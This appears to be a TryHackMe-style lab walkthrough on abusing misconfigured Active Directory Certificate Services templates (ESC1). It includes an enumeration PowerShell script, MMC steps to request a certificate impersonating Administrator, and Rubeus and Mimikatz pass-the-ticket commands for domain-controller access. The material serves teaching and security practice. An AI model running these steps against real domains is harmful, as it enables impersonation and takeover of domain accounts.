Exploiting certificates
Active Directory Certificate Services (AD CS) is Microsoft’s PKI implementation. It is used in:
Establishing trusts between domains
Encryption
Digital signatures
Authentication
Certificate templates define what a certificate may be used for (its extended key usages), how its subject and key are built, and which principals may enrol for it. This lets an organization delegate certificate issuance to authorized users without involving a CA administrator for every request.
Finding vulnerable certificate templates
Use the RDP session on THMSERVER2 to enumerate certificate templates:
certutil -Template -v > .\templates.txt
A certificate template can be abused for user impersonation if all of the following are present:
Client Authentication: the certificate can be used for client authentication (a client-auth, PKINIT or smart-card-logon EKU, or no EKU restriction at all)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: the requester can specify the subject and a Subject Alternative Name (SAN) of their choosing, such as another user's UPN
CTPRIVATEKEY_FLAG_EXPORTABLE_KEY: the private key can be exported along with the certificate
Certificate Permissions: the requesting user (or a group it belongs to) has the Enroll permission on the template
This combination is only one of the misconfigurations SpecterOps describes in their "Certified Pre-Owned" paper (they list eight common ones, of which this SAN-in-request case is ESC1), so a template that fails these four checks may still be exploitable in another way.
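The certutil dump above is long and easy to misread, so here is an added example (not code from the original page) that queries the template container in the Configuration partition over LDAP and evaluates the four conditions for every template. It assumes it runs in a domain-joined session such as the THMSERVER2 RDP session; the bit values, the Enroll right GUID and the EKU OIDs are Microsoft's documented constants, and the list of "low-privileged" groups is an assumption you should extend with the groups your current user belongs to.

```powershell
# Added example: enumerate AD CS templates and flag the ESC1-style combination.
# Assumes a domain-joined session; resolves the Configuration NC automatically.
$rootDSE   = [ADSI]'LDAP://RootDSE'
$configNC  = $rootDSE.configurationNamingContext
$templates = [ADSI]"LDAP://CN=Certificate Templates,CN=Public Key Services,CN=Services,$configNC"

$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1    # bit in msPKI-Certificate-Name-Flag
$CTPRIVATEKEY_FLAG_EXPORTABLE_KEY  = 0x10   # bit in msPKI-Private-Key-Flag
$EnrollRight = [Guid]'0e10c968-78fb-11d1-a9c0-0000f80367c1'   # Certificate-Enrollment extended right

# EKUs that let the resulting certificate authenticate a user over PKINIT.
# An empty pKIExtendedKeyUsage means "any purpose" and counts as well.
$AuthEkus = @('1.3.6.1.5.5.7.3.2',        # Client Authentication
              '1.3.6.1.5.2.3.4',          # PKINIT Client Authentication
              '1.3.6.1.4.1.311.20.2.2',   # Smart Card Logon
              '2.5.29.37.0')              # Any Purpose

# Assumption: principals whose Enroll right makes a template interesting to a low-privileged attacker.
$LowPrivGroups = @('Domain Users', 'Authenticated Users', 'Everyone')

$results = foreach ($t in $templates.Children) {
    $nameFlag = [int]$t.Properties['msPKI-Certificate-Name-Flag'].Value
    $keyFlag  = [int]$t.Properties['msPKI-Private-Key-Flag'].Value
    $ekus     = @($t.Properties['pKIExtendedKeyUsage'].Value | Where-Object { $_ })

    # Principals allowed to enrol: explicit Enroll right, "all extended rights" (empty GUID) or GenericAll.
    $enrollers = $t.ObjectSecurity.GetAccessRules($true, $true, [System.Security.Principal.NTAccount]) |
        Where-Object {
            $_.AccessControlType -eq 'Allow' -and (
                ($_.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::GenericAll) -or
                (($_.ActiveDirectoryRights -band [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight) -and
                 ($_.ObjectType -eq $EnrollRight -or $_.ObjectType -eq [Guid]::Empty))
            )
        } | ForEach-Object { $_.IdentityReference.Value }

    $lowPriv = @($enrollers | Where-Object {
        $p = $_
        $LowPrivGroups | Where-Object { $p -eq $_ -or $p -like "*\$_" }
    })

    [PSCustomObject]@{
        Template        = [string]$t.Properties['cn'].Value
        ClientAuth      = ($ekus.Count -eq 0) -or [bool]($ekus | Where-Object { $AuthEkus -contains $_ })
        SuppliesSubject = [bool]($nameFlag -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
        ExportableKey   = [bool]($keyFlag -band $CTPRIVATEKEY_FLAG_EXPORTABLE_KEY)
        LowPrivEnroll   = ($lowPriv -join ', ')
    }
}

# Templates matching all four conditions from the list above
$results | Where-Object { $_.ClientAuth -and $_.SuppliesSubject -and $_.ExportableKey -and $_.LowPrivEnroll } |
    Format-Table -AutoSize
```

Two caveats when reading the output. A template that exists in the container but is not published on any CA cannot be requested, so cross-check the hits against `certutil -CATemplates`. And the exportable-key flag only matters for the MMC export path used below: when the request is made from the command line the private key is generated and kept by the requester anyway, so a template that fails only that check is still worth a closer look.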
Exploiting a Certificate Template
Using RDP access on THMSERVER2, request a certificate. (If you use Remmina and save the config of the RDP connection, make sure to disable Restricted admin mode.) Use the Microsoft Management Console (MMC):
Click Start -> run
Type mmc and hit enter
Click File -> Add/Remove Snap-in..
Add the Certificates snap-in and make sure to select Computer Account and Local computer on the prompts.
Click OK
Request a personal certificate:
Right Click on Personal and select All Tasks->Request New Certificate…
Click Next twice to select the AD enrollment policy.
You will see one template that we can request, but before enrolling we need to provide additional information.
Click on the More Information warning.
Change the Subject name Type option to Common Name and provide any value (the CN does not matter for authentication, only the SAN does), then click Add.
Change the Alternative name Type option to User principal name.
Supply the UPN of the user you want to impersonate. The best would be a DA account such as Administrator@za.tryhackme.loc. Click Add, then Apply and OK.
Select the certificate and click Enroll. You should now see your certificate under Personal -> Certificates.
Export the certificate with the private key:
Right-click on the certificate and select All Tasks -> Export…
Click Next, select Yes, export the private key, and click Next.
Click Next, then set a password for the certificate since the private key cannot be exported without a password.
Click Next and select a location to store the certificate.
Click Next and finally click Finish.
User impersonation through a certificate
Use the certificate to request a Kerberos ticket-granting ticket (TGT) for the impersonated user via PKINIT, then load that TGT into your attack platform of choice.
Use Rubeus to request the TGT with the certificate (the /password value is the PFX export password):
C:\Tools\Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\username\Desktop\mycert.pfx /password:Password123 /outfile:pwn.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101
Use Mimikatz to Pass-the-Ticket:
C:\Tools\mimikatz_trunk\x64\mimikatz.exe
mimikatz # privilege::debug
mimikatz # kerberos::ptt pwn.kirbi
mimikatz # misc::cmd
C:> explorer.exe
From the new shell, browse the file system of the domain controller (for example its C$ administrative share) from THMSERVER2; klist in that shell should show the injected TGT for the impersonated user.